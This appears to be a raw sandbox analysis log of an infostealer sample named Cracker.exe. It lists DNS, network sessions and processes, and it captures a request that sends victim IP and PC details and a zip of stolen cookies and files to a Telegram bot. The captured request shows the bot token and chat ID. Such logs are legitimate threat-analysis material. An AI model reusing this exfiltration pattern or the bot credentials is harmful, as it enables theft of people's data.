                                                     Nov 8, 2024 11:44:09.547338963 CET | 1.1.1.1 | 192.168.2.8 | 0x73b4 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                    • api.telegram.org
                                                    • ipwho.is
                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     0 | 192.168.2.8 | 49731 | 108.181.61.49 | 80 | 7528 | C:\Users\user\Desktop\Cracker.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Nov 8, 2024 11:43:50.185416937 CET | 59 | OUT | GET /?output=json HTTP/1.1
                                                    accept: */*
                                                    host: ipwho.is
                                                     Nov 8, 2024 11:43:51.342067957 CET | 955 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 08 Nov 2024 10:43:51 GMT
                                                    Content-Type: application/json; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Server: ipwhois
                                                    Access-Control-Allow-Headers: *
                                                    X-Robots-Tag: noindex
                                                    Data Ascii: 2cb{"ip":"173.254.250.90","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"Quadranet, INC","isp":"Quadranet Enterprises LLC","domain":"quadranet.com"},"timezone":{"id":"America\/Chicago","abbr":"CST","is_dst":false,"offset":-21600,"utc":"-06:00","current_time":"2024-11-08T04:43:51-06:00"}}0


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     0 | 192.168.2.8 | 49732 | 149.154.167.220 | 443 | 7528 | C:\Users\user\Desktop\Cracker.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     2024-11-08 10:44:10 UTC | 1184 | OUT | POST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-4128830475&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-06:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%203CYSMP%20(1280,%201024)%0AHWID:%207263582169614543%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cracker.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                                    content-type: multipart/form-data; boundary=0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961
                                                    content-length: 936023
                                                    accept: */*
                                                    host: api.telegram.org
                                                     2024-11-08 10:44:10 UTC | 15200 | OUT | Data Ascii:
                                                     --0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961
                                                     Content-Disposition: form-data; name="document"; filename="[US]_173.254.250.90.zip"
                                                     Content-Type: application/zip

                                                     PK^hYAutofill/PK^hY
                                                     2024-11-08 10:44:11 UTC | 389 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 08 Nov 2024 10:44:11 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 1265
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                     Target ID: 0
                                                     Start time: 05:43:14
                                                     Start date: 08/11/2024
                                                     Path: C:\Users\user\Desktop\Cracker.exe
                                                     Wow64 process (32bit): false
                                                     Commandline: "C:\Users\user\Desktop\Cracker.exe"
                                                     Imagebase: 0x7ff67a9e0000
                                                     File size: 2'269'184 bytes
                                                     MD5 hash: 0F8507A31B1A48F31F26321C9762A513
                                                     Has elevated privileges: true
                                                     Has administrator privileges: true
                                                     Programmed in: C, C++ or other language
                                                     Reputation: low
                                                     Has exited: true

                                                     Target ID: 3
                                                     Start time: 05:43:50
                                                     Start date: 08/11/2024
                                                     Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                     Wow64 process (32bit): false
                                                     Commandline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                     Imagebase: 0x7ff6cb6b0000
                                                     File size: 452'608 bytes
                                                     MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                                                     Has elevated privileges: true
                                                     Has administrator privileges: true
                                                     Programmed in: C, C++ or other language
                                                     Reputation: high
                                                     Has exited: true

                                                     Target ID: 4
                                                     Start time: 05:43:50
                                                     Start date: 08/11/2024
                                                     Path: C:\Windows\System32\conhost.exe
                                                     Wow64 process (32bit): false
                                                     Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                     Imagebase: 0x7ff6ee680000
                                                     File size: 862'208 bytes
                                                     MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                                                     Has elevated privileges: true
                                                     Has administrator privileges: true
                                                     Programmed in: C, C++ or other language
                                                     Reputation: high
                                                     Has exited: true

                                                    No disassembly